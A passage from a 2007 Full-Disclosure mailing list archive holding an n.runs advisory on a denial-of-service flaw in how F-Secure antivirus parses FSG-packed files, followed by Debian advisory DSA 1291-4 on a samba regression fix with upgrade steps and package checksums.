30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document. ________________________________________________________________________ Credit: Bugs found by Sergio Alvarez of n.runs AG. ________________________________________________________________________ References: http://www.f-secure.com/security/fsc-2007-3.shtml [1] This Advisory and Upcoming Advisories: http://www.nruns.com/parsing-engines-advisories.php ________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security at nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply. From security at nruns.com Mon Jun 4 17:55:52 2007 From: security at nruns.com (security at nruns.com) Date: Mon, 4 Jun 2007 18:55:52 +0200 Subject: [Full-disclosure] n.runs-SA-2007.015 - F-Secure Antivirus FSG packed files parsing Infinite Loop Advisory Message-ID: n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.015 04-Jun-2007 ________________________________________________________________________ Vendor: F-Secure Corporation, http://www.f-secure.com Affected Products: F-Secure Anti-Virus for Workstations version 7.00 and earlier F-Secure Anti-Virus for Windows Servers version 7.00 and earlier F-Secure Anti-Virus for Citrix Servers version 5.52 F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier F-Secure Anti-Virus Client Security version 7.00 and earlier F-Secure Anti-Virus for MS Exchange version 7.00 and earlier F-Secure Internet Gatekeeper version 6.60 and earlier F-Secure Internet Security 2005, 2006 and 2007 F-Secure Anti-Virus 2005, 2006 and 2007 Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier F-Secure Anti-Virus for Linux Servers version 4.65 and earlier F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier F-Secure Anti-Virus Linux Client Security 5.52 and earlier F-Secure Anti-Virus Linux Server Security 5.52 and earlier F-Secure Internet Gatekeeper for Linux 2.16 and earlier Vulnerability: Infinite Loop DoS (remote) Risk: HIGH ________________________________________________________________________ Vendor communication: 2007/05/07 initial notification to F-Secure Corporation 2007/05/08 F-Secure Corporation Response 2007/05/08 PGP public keys exchange 2007/05/08 PoC files sent to F-Secure Corporation 2007/05/14 F-Secure Corporation acknowledged the PoC files 2007/05/18 F-Secure Corporation validate the Vulnerability 2007/05/18 F-Secure Corporation notify update release date 2007/05/30 F-Secure Corporation released Update with fixes ________________________________________________________________________ Overview: F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom and mobile handset manufacturers such as Nokia. Description: A remotely exploitable vulnerability has been found in the files parsing engine. In detail, the following flaw was determined: - Infinite Loop in FSG packed files parsing Impact: This problem can lead to remote denial of service provoked by high CPU consume and exhaustion of storage resource if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in F-Secure Corporation software products above mentioned in all platforms supported by the affected products. Solution: The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document. ________________________________________________________________________ Credit: Bugs found by Sergio Alvarez of n.runs AG. ________________________________________________________________________ References: http://www.f-secure.com/security/fsc-2007-3.shtml [1] This Advisory and Upcoming Advisories: http://www.nruns.com/parsing-engines-advisories.php ________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security at nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply. From jmm at debian.org Mon Jun 4 20:37:12 2007 From: jmm at debian.org (Moritz Muehlenhoff) Date: Mon, 4 Jun 2007 21:37:12 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1291-4] New samba packages fix regression Message-ID: <20070604193712.GA3810@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1291-4 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff June 4th, 2007 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : samba Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-2444 CVE-2007-2446 CVE-2007-2447 The security update for CVE-2007-2446 introduced a regression, which broke connection to domain member servers in some scenarios. This update fixes this regression. For the stable distribution (etch), this regression has been fixed in version 3.0.24-6etch4. The old stable distribution (sarge) is not affected by this problem. For the unstable distribution (sid) this regression has been fixed in version 3.0.25a-1. We recommend that you upgrade your samba package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4.dsc Size/MD5 checksum: 1425 8f114259be89190e485ce7af9819237a http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4.diff.gz Size/MD5 checksum: 213975 b1f423e27b5e602bde20079af4def838 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24.orig.tar.gz Size/MD5 checksum: 17708128 89273f67a6d8067cbbecefaa13747153 Architecture independent components: http://security.debian.org/pool/updates/main/s/samba/samba-doc-pdf_3.0.24-6etch4_all.deb Size/MD5 checksum: 6598934 edd2357b274c390c5eb1b717375739d3 http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.0.24-6etch4_all.deb Size/MD5 checksum: 6913278 b021af0b6c3418b746ba8601633b1074 Alpha architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 482930 b6e67ff868c705124ecc222c294b6325 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 879454 8d5b5d98ae37936a88fe620048b9e894 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 113980 833b703e6ba45577a13fa43e3d62f960 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 6705198 df69305a975f71d4b8516c9e40e10d21 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 4000734 067cc959bf00313dcbccfba7d7b25071 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 2841182 c1888f9524b3164a51d82e18645b21bd http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 12298040 b8c24282e1905515e8df4027285ead0e http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 4845482 b0855a6477a5360108d386bf1d9c638e http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 521328 3650131a525b484a052a9187d91fd952 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 956084 3c86aa8c33d96d4c29b3c423fb17f436 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 2286240 6ad90d8e15d1910a7c341682c1b0952b AMD64 architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 461894 76ea859453e8a97b4e41c4cfb2688f08 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 831230 c8cf22235f65be1a6141bb026b5449e8 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 112268 49c6b6a6566e8387fce1a5db47222499 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 6254586 ac66bce2c71fc3a619b0f7f5beb9fbf8 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 3601620 d183a5bc0a81658de438a2775d9c21c7 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 2596688 022ef5936a56486faa977ccaa3538185 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 12190798 a2ffa4a3f63dd30f3935e38b74aba34d http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 4313522 88a992c0ca031403f592cec7aba5abcf http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 456748 637541087e11ab2e3c26d320a01401c8 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 866416 5875133cfef67675690df31469364cad http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 2074558 397adf9c84898fbd93af5c426b736dc1 ARM architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_arm.deb Size/MD5 checksum: 417884 70061ed6075ff23146579e391862a2a1 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_arm.deb Size/MD5 checksum: 758294 f16aaa674d3be6514b4e08f2cde57bac http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_arm.deb Size/MD5 checksum: 112270 f60d1a4a7ecf02e7a71a35520e3ed6dc http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_arm.deb Size/MD5 checksum: 5591764 ecedd28eff3794e778d23fdfb53ba46f http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_arm.deb Size/MD5 checksum: 3284970 6f0bc836f04ad90c26c1c522bd3ba9f2 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_arm.deb Size/MD5 checksum: 2379510 3b5c1bd4451fc46586caaf21de7ceae0 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_arm.deb Size/MD5 checksum: 11566956 b8691179c421a3c795c680e5a7bcbab8 http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_arm.deb Size/MD5 checksum: 3910120 336d55808167200abf04835ec12f3fe5 http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_arm.deb Size/MD5 checksum: 418922 f1090cebcb9ab528b762ad8bf59159d8 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_arm.deb Size/MD5 checksum: 796794 cddffa704bb3a1649172deb936781745 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_arm.deb Size/MD5 checksum: 1871460 8a4376eedec9a8f3af634ca831b26922 HP Precision architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 484386 5ae89afe023b4c618eeeb4ba1379c188 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 877482 4c0a1df81c6e484d79c12f9b12537cd6 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 112270 5396584edd057baa7d196608cb215f11 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 6560918 f3bb7862dc1324a0a469fcdbc812e8df http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 3697328 7674f4ce89e63f768b4463c04100f049 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 2647858 945c040a41d3acf1381215b9480409d0 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 11911604 8e64eb37bb33168996ed98716a3c538a http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 4428630 286b63ab17a389958b7b655f77651a70 http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 470606 d3de90d71d4cd9c19fcadd310a6fc45d http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 885948 c698f5aea3f457ae552767c304c3e456 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_hppa.deb Size/MD5 checksum: 2135416 ad6e43c474407ba16486f7b6a5636886 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_i386.deb Size/MD5 checksum: 418750 2be3fbf44f3d780a7c72843c6cd80ed2 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_i386.deb Size/MD5 checksum: 757934 788ed2181d01a040971a45b0f23fe0f3 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_i386.deb Size/MD5 checksum: 112288 70a58e3b271f8f70cdf612d9bde3e60e http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_i386.deb Size/MD5 checksum: 5661190 78b953065296886d37a5c19949ab94d6 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_i386.deb Size/MD5 checksum: 3261176 b6e68104b8d6b5d1f79cbca593b3a8f6 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_i386.deb Size/MD5 checksum: 2381022 58854e78ba73d98b529271d745416dac http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_i386.deb Size/MD5 checksum: 11885652 c5deb03cfcecaf4a3a5ce2638ac6a456 http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_i386.deb Size/MD5 checksum: 3880346 be4fb85f5605487e7fa5fbbb7e416544 http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_i386.deb Size/MD5 checksum: 412782 3ea8fc5b5bcd3691d98292786da16430 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_i386.deb Size/MD5 checksum: 793304 ec699ee2636836630c1f5257829f9658 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_i386.deb Size/MD5 checksum: 1865746 4274db9063f9b95622486a2c382f7008 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 592000 c3b388b0e3bd43649dc432110e5f6b78 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 1068488 604241d0c64bde538254dd788057153a http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 112266 a476c25baf82e0b29b1423dcdbf73925 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 8089256 6f0f6303fdbda791cfa1ddf8ee566c30 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 5042446 71aa26b10de9e7922d7b425bf6954864 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 3476950 6b041897fa75eaa4f25bfe6da613777e http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 11172558 3e513da28660418aed1f89fc24806b48 http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 6080830 190c617424b7e14518d34508d5c3a899 http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 627354 fff2a38996bae59228f193f5de931320 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 1181668 957df40559e07b69752a583fe9ef817e http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_ia64.deb Size/MD5 checksum: 2883974 43b1dadf979f7383be27553a8a9d7a37 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_mips.deb Size/MD5 checksum: 432934 3879dbf94789d9c209edd17222760a7d http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_mips.deb Size/MD5 checksum: 753740 391b8fd7b71c4b9b8b95e475a91cf708 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_mips.deb Size/MD5 checksum: 112284 0be887a46e1d88974bc34370d5c20634 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_mips.deb Size/MD5 checksum: 5490980 5445310f3a8ee7776fce7dbe0e414064 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_mips.deb Size/MD5 checksum: 3543000 924de046d26bf604aba9f454b7cb4ea2 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_mips.deb Size/MD5 checksum: 2527988 f6649a9c4ff3d8011d1cce7baac7d2c0 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_mips.deb Size/MD5 checksum: 12719812 e5da6929ea771866f4402ac9b00a76ee http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_mips.deb Size/MD5 checksum: 4175486 1158e62cf957478dd323520cba7c45eb http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_mips.deb Size/MD5 checksum: 454326 aafdb87b8fcf5b578f7ea0928f771691 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_mips.deb Size/MD5 checksum: 832748 8b4986960ddf57744caa5427eb192b50 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_mips.deb Size/MD5 checksum: 2000856 91cbf4faf1fb0bbea95da289fc99d2ae Little endian MIPS architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 432406 39880d0d6c8271375d8f21167110f8fa http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 754408 a336bc3def4baf387a01ea6eedfe7d1c http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 112288 9b85cd019cb3c5cb58bfbdb825bec99c http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 5484370 be121e5dcbaf4faba172673a5f7a8b4a http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 3548974 2ba6958ecc4be2d60b66dab1a5340df9 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 2527760 835eb35ca3ec6efeafe9794fd6f2efc2 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 12366136 a0e36e2e830d12c171f547d09d881875 http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 4173190 cd67f891163cb1e1462456384504115d http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 454316 0e8bf557267d6c6629901107b5686b3d http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 833992 96950e212d570cf01594315ef710f3d8 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_mipsel.deb Size/MD5 checksum: 2002524 7db5c9aa55c4368d1a2916f5709e3a14 PowerPC architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 449936 fbd78b3349ec5c8d287e41642843ffdc http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 815922 3304ffe603c716cde274150a0056fa7d http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 112268 8cd33b704437260d47c470420cd826b1 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 6017874 6395c16bca6ff26c8e2aa84da491ede4 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 3552428 7533b32c47c19047d89136b6e4461088 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 2547690 4e029e51d2c080ed87b861de524bc3c5 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 12441456 d6a629f72077c8d7d17830b38046a80c http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 4229648 4719512117015dde2efa73f85ef670fd http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 456592 f9e2463cd88d92dfc51a975e7107ece4 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 850612 507fed59a92bb29ca10eae4cbe3ac412 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_powerpc.deb Size/MD5 checksum: 2028372 d15c6d3ce845b23caa0c51570597891b IBM S/390 architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_s390.deb Size/MD5 checksum: 477148 51d097d3886c8fcf43db15f51d9052f4 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_s390.deb Size/MD5 checksum: 838982 87b5763923c6fae2563409080f8a9896 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_s390.deb Size/MD5 checksum: 112272 9108f388cfe683325f3f10a90c2d16f1 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_s390.deb Size/MD5 checksum: 6375926 cf074317a2ff811c95acd5cae83f7131 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_s390.deb Size/MD5 checksum: 3564074 211e144b7090aa075efbcd850159d5f1 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_s390.deb Size/MD5 checksum: 2557762 1ef4217aa554e62bc2d808d4b0ec8648 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_s390.deb Size/MD5 checksum: 12288390 a35fee23e23a8eb34b36c1ccf7be3b2f http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_s390.deb Size/MD5 checksum: 4235022 fcce5bd08e3a316b3d018f483a2eb1b5 http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_s390.deb Size/MD5 checksum: 459034 6d4e649379f4560a7e58a641153c6eca http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_s390.deb Size/MD5 checksum: 844014 fc538aaf2c726c6bf9a3dc96df7ebfc6 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_s390.deb Size/MD5 checksum: 2063578 e2690c3a92f0634aa835361d04e833d7 Sun Sparc architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_sparc.deb Size/MD5 checksum: 422328 8081f278807cad663f80cd17b237661a http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_sparc.deb Size/MD5 checksum: 758476 6bcef151e2bf008a943ebd48ad025a5e http://security.debian.org/p